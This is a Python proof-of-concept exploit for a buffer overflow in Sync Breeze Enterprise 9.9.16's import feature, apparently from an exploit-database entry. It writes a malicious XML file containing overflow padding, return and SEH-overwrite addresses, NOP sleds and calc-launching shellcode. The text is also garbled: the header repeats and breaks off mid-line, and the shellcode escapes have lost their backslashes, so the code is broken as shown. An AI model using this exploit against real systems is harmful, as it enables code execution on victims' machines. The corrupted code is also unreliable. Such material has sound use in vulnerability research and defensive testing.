#!/usr/bin/python

# Exploit Title : Sync Breeze Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : a #!/usr/bin/python

# Exploit Title : Sync Breeze Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.9.16.exe
# Tested Version : 9.9.16
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open sync breeze software , right click and click on import command . Select pyramid.xml file .

import os,struct

#offset to eip
junk = "A" * (1560)

#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)

#NOPS
nops = "x90"

#LEA EAX, [ESP+76]
esp = "x8Dx44x24x4c"

#JMP ESP
jmp2 = "xFFxE0"

#JMP Short
nseh = "x90x90xEBx05" #Jump short 5



#POP POP RET (libspp.dll)
seh = struct.pack('<L',0x10015FFE)


#CALC.EXE
shellcode = "x31xdbx64x8bx7bx30x8bx7fx0cx8bx7fx1cx8bx47x08x8bx77x20x8bx3fx80x7ex0cx33x75xf2x89xc7x03x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x89xddx8bx34xafx01xc6x45x81x3ex43x72x65x61x75xf2x81x7ex08x6fx63x65x73x75xe9x8bx7ax24x01xc7x66x8bx2cx6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x89xd9xb1xffx53xe2xfdx68x63x61x6cx63x89xe2x52x52x53x53x53x53x53x53x52x53xffxd7"


# FINAL PAYLOAD
evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode


#FILE
file='<?xml version="1.0" encoding="UTF-8"?> <classify name='' + evil + ' </classify>'

f = open('pyramid.xml', 'w')
f.write(file)
f.close()